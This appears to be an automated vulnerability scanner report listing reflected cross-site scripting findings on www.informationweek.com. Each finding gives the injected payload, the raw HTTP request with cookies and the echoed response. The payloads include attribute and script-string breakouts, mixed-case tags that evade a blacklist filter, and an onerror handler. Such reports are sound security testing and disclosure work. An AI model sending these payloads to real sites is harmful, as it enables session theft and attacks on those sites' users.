This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /government1c497"%20style%3dx%3aexpression(alert(1))%20c3944caa6b/ HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:20:32 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:20:32 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30182
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/government1c497" style=x:expression(alert(1)) c3944caa6b/;kvarticleid=;kvauthor=;loc=300;grp=811755908" target="_blank"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f975e'-alert(1)-'e1456463cfe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /governmentf975e'-alert(1)-'e1456463cfe/ HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:20:33 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:20:33 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 29918
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/governmentf975e'-alert(1)-'e1456463cfe/;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=447361092;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be156"><script>alert(1)</script>af0b013896d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /healthcarebe156"><script>alert(1)</script>af0b013896d/ HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:20:18 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:20:18 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30174
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/healthcarebe156"><script>alert(1)</script>af0b013896d/;kvarticleid=;kvauthor=;loc=300;grp=99570369" target="_blank"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aa7fb</script><a%20b%3dc>5e712078002 was submitted in the REST URL parameter 1. This input was echoed as aa7fb</script><a b=c>5e712078002 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /healthcareaa7fb</script><a%20b%3dc>5e712078002/ HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:20:24 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:20:24 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30010
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/healthcareaa7fb</script><a b=c>5e712078002/;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=280410015;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1f71"><ScRiPt>alert(1)</ScRiPt>df0da315397 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /d1f71"><ScRiPt>alert(1)</ScRiPt>df0da315397/ HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:19:50 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:19:50 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30036
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/d1f71"><ScRiPt>alert(1)</ScRiPt>df0da315397/;kvarticleid=;kvauthor=;loc=300;grp=147887707" target="_blank"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6340d</ScRiPt%20><img%20src%3da%20onerror%3dalert(1)>8f54963dd57 was submitted in the REST URL parameter 1. This input was echoed as 6340d</ScRiPt ><img src=a onerror=alert(1)>8f54963dd57 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /6340d</ScRiPt%20><img%20src%3da%20onerror%3dalert(1)>8f54963dd57/ HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:19:56 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:19:56 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30172
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/6340d</ScRiPt ><img src=a onerror=alert(1)>8f54963dd57/;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=346810551;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2a404'-alert(1)-'e51ec36f67a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news2a404'-alert(1)-'e51ec36f67a/galleries/smb/ebusiness/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:44 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:44 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30771
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_SMB_Ebusiness_Welcome_Ad_1x1;key=/news2a404'-alert(1)-'e51ec36f67a/galleries/smb/ebusiness/s;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=347770898;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56df9"><script>alert(1)</script>f819bc441ff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news56df9"><script>alert(1)</script>f819bc441ff/galleries/smb/ebusiness/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:42 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:42 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30809
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_SMB_Ebusiness_Welcome_Ad_1x1;key=/news56df9"><script>alert(1)</script>f819bc441ff/galleries/;kvarticleid=;kvauthor=;loc=300;grp=51624629" target="_blank"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d6f3"><script>alert(1)</script>b43644bf6f2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/galleries6d6f3"><script>alert(1)</script>b43644bf6f2/smb/ebusiness/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:47 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:47 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30826
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_SMB_Ebusiness_Welcome_Ad_1x1;key=/news/galleries6d6f3"><script>alert(1)</script>b43644bf6f2/;kvarticleid=;kvauthor=;loc=300;grp=590162705" target="_blank"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55a44'-alert(1)-'3675c7ce266 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/galleries55a44'-alert(1)-'3675c7ce266/smb/ebusiness/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:49 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:49 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30776
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_SMB_Ebusiness_Welcome_Ad_1x1;key=/news/galleries55a44'-alert(1)-'3675c7ce266/smb/ebusiness/s;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=116074273;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc64c"><a%20b%3dc>ea41986d2b6 was submitted in the REST URL parameter 3. This input was echoed as bc64c"><a b=c>ea41986d2b6 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /news/galleries/smbbc64c"><a%20b%3dc>ea41986d2b6/ebusiness/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:55 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:55 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30255
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/news/galleries/smbbc64c"><a b=c>ea41986d2b6/ebusiness/show;kvarticleid=;kvauthor=;loc=300;grp=389870957" target="_blank"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d640b'-alert(1)-'f778d3bcf48 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/galleries/smbd640b'-alert(1)-'f778d3bcf48/ebusiness/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:24:01 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:24:01 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30241
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/news/galleries/smbd640b'-alert(1)-'f778d3bcf48/ebusiness/s;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=676901299;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 276ed'-alert(1)-'15a6d2c5c10 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/galleries/smb/ebusiness276ed'-alert(1)-'15a6d2c5c10/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:24:10 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:24:10 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30748
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... 'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_SMB_Ebusiness_Welcome_Ad_1x1;key=/news/galleries/smb/ebusiness276ed'-alert(1)-'15a6d2c5c10/s;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=946810314;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c39e2"><a%20b%3dc>7594f40ed3d was submitted in the REST URL parameter 4. This input was echoed as c39e2"><a b=c>7594f40ed3d in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /news/galleries/smb/ebusinessc39e2"><a%20b%3dc>7594f40ed3d/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:24:06 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:24:06 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30762
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_SMB_Ebusiness_Welcome_Ad_1x1;key=/news/galleries/smb/ebusinessc39e2"><a b=c>7594f40ed3d/show;kvarticleid=;kvauthor=;loc=300;grp=129603650" target="_blank"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 342cb"><script>alert(1)</script>30da13bdb15 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news342cb"><script>alert(1)</script>30da13bdb15/global-cio/interviews/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
